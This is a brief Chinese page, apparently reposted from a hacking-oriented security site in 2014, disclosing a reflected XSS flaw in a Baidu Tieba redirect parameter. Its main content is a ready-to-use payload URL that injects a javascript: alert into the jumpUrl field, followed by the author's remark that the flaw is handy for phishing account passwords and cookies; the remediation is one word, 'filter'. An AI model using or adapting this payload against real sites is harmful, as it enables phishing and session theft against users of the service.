百度贴吧某处反射型XSS漏洞下载

来源:黑吧安全网 浏览:960次 时间:2014-06-12
做网站找雨过天晴工作室

百度贴吧某处反射型XSS漏洞

http://tieba.baidu.com/f/user/passport?jumpUrl=javascript:alert(document.domain)



需要登录才可以触发,用来钓鱼片账号密码和cookie还是很不错的

修复方案:

过滤